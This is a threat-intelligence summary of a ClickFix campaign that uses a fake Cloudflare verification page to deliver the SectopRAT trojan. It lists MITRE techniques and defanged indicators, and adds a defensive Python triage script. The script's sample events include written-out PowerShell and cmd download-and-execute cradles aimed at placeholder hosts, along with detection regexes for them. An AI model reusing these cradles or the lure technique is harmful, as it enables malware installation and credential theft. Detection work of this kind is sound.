I Am Not A Robot
A recent ClickFix-style social engineering campaign delivers a variant of the SectopRAT malware behind a fake Cloudflare verification challenge: the victim, believing they are proving they are not a robot, runs the first stage themselves. The Remote Access Trojan then exfiltrates browser data, cryptocurrency wallets and system information, and uses several evasion techniques to avoid detection. Affected: Users, Browsers, Cryptocurrency Holders

Key points :

  • ClickFix-style social engineering, in which the victim is lured into running a command themselves, is becoming more prevalent among threat groups.
  • SectopRAT is a Remote Access Trojan that has been active since early 2019.
  • The malware steals browser credentials, harvests cryptocurrency wallets, and profiles the infected system.
  • SectopRAT can create a concealed secondary desktop from which the operator controls the machine without the user noticing.
  • It uses robust anti-analysis techniques and protects its command-and-control (C2) communication.
  • It is typically distributed through malvertising and drive-by downloads.
  • Users are lured through deceptive websites mimicking legitimate services, in this case a Cloudflare verification challenge.
  • Anti-debugging checks hinder dynamic analysis and sandbox detonation.
  • The data collected includes system information, stored cookies, saved passwords, and cryptocurrency wallet data.
  • Social engineering tactics continue to evolve, so defensive controls and user awareness need to keep pace.

MITRE Techniques :

  • Tactic: Initial Access (T1189 Drive-by Compromise) – Procedure: malvertising campaigns redirect victims to the fake verification page.
  • Tactic: Execution (T1059.001 PowerShell, T1204 User Execution) – Procedure: the victim is lured into running a PowerShell command that downloads and executes the payload.
  • Tactic: Defense Evasion (T1027 Obfuscated Files or Information, T1622 Debugger Evasion) – Procedure: heavily obfuscated JavaScript on the lure page and anti-debugging checks in the malware.
  • Tactic: Credential Access (T1555.003 Credentials from Web Browsers, T1539 Steal Web Session Cookie) – Procedure: theft of browser-stored passwords and cookies.
  • Tactic: Discovery (T1082 System Information Discovery) – Procedure: system profiling of the infected host.
  • Tactic: Collection – Procedure: harvesting of system information, cookies, passwords, and cryptocurrency wallet data.
  • Tactic: Defense Evasion / Command and Control (T1564 Hide Artifacts) – Procedure: creation of a concealed secondary desktop for remote manipulation.
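The Execution entry above is where a defender gets a high-fidelity signal: a ClickFix lure ends with the victim pasting a command, typically a PowerShell download cradle, into the Run dialog (Win+R), which shows up in telemetry as an interpreter spawned directly by explorer.exe. The following triage script is an added example written for this page, not code from the original post or from Inde. It runs simple indicator matching over constructed Sysmon-style process-creation records; the event fields, the example.invalid URLs, the Base64 filler and the "I am not a robot" comment heuristic are all assumptions made for illustration, not observations from the campaign.

```python
"""Heuristic triage of process-creation events for ClickFix-style download
cradles launched from the Run dialog (explorer.exe -> interpreter).

Example code for this page; the sample events below are constructed."""
import re

# Interpreters a victim would plausibly be told to paste a command into via Win+R.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe")

# (label, regex) pairs. Matching is case-insensitive because PowerShell is.
CRADLE_PATTERNS = [
    ("download",  re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|"
                             r"downloadstring|downloadfile|net\.webclient|"
                             r"start-bitstransfer|curl|wget)\b", re.I)),
    ("execute",   re.compile(r"(\|\s*iex\b|invoke-expression|\biex\s*\()", re.I)),
    ("encoded",   re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden",    re.compile(r"\s-w(in|indowstyle)?\s+hidden\b", re.I)),
    ("url",       re.compile(r"https?://", re.I)),
    # Assumption: ClickFix lures commonly append reassuring text after a PowerShell
    # comment marker so the victim sees it in the Run box. Treated as a heuristic.
    ("lure_text", re.compile(r"#.*(not a robot|verif|captcha)", re.I)),
]

# Constructed sample events in a Sysmon Event ID 1 style (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/cloud | iex" '
                    '# "I am not a robot - reCAPTCHA Verification ID: 4821"'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",     # scheduled task, not a user paste
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",             # benign Run-dialog use
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-Date"'},
    {"ParentImage": r"C:\Windows\explorer.exe",             # encoded variant; Base64 is filler
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAA="},
    {"ParentImage": r"C:\Windows\explorer.exe",             # cmd/curl variant
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c curl -s https://example.invalid/plo -o %TEMP%\u.exe && %TEMP%\u.exe"},
]


def _basename(path):
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(event):
    """Return matched indicator labels for one event, or [] if not flagged.

    An event is flagged only when an interpreter is spawned by explorer.exe (what a
    Win+R paste looks like) AND the command line carries a download, execute or
    encoded-command indicator; the remaining labels only add context.
    """
    if _basename(event["ParentImage"]) != "explorer.exe":
        return []
    if _basename(event["Image"]) not in INTERPRETERS:
        return []
    hits = [label for label, rx in CRADLE_PATTERNS if rx.search(event["CommandLine"])]
    if not ({"download", "execute", "encoded"} & set(hits)):
        return []
    return hits


def triage_events(events):
    """Map the index of each flagged event to its indicator labels."""
    return {i: hits for i, e in enumerate(events) if (hits := triage_event(e))}


if __name__ == "__main__":
    for idx, labels in triage_events(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(labels)}")
        print(f"  {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The parent-process condition is what keeps this usable: download cradles run by management tooling under svchost.exe or a scheduled task are not flagged, and a user typing a harmless command into Run is not flagged either. In a real deployment the same logic can be fed from Sysmon Event ID 1, Windows Security Event 4688 with command-line auditing, or an EDR process table, and the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU gives a second, host-forensics view of what was pasted.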

Indicators of Compromise :

  • [URL] hXXps://forfsakencoilddxga[.]com/cloud
  • [URL] hXXps://caprofklfkzttripwith[.]com/main2.js
  • [URL] hXXps://ownlifeforyouwithme[.]com/plo
  • [URL] hXXps://serviceindustrverif[.]com
  • [Domain] serviceindustrverif[.]com

Full Story: https://www.inde.nz/blog/i-am-not-a-robot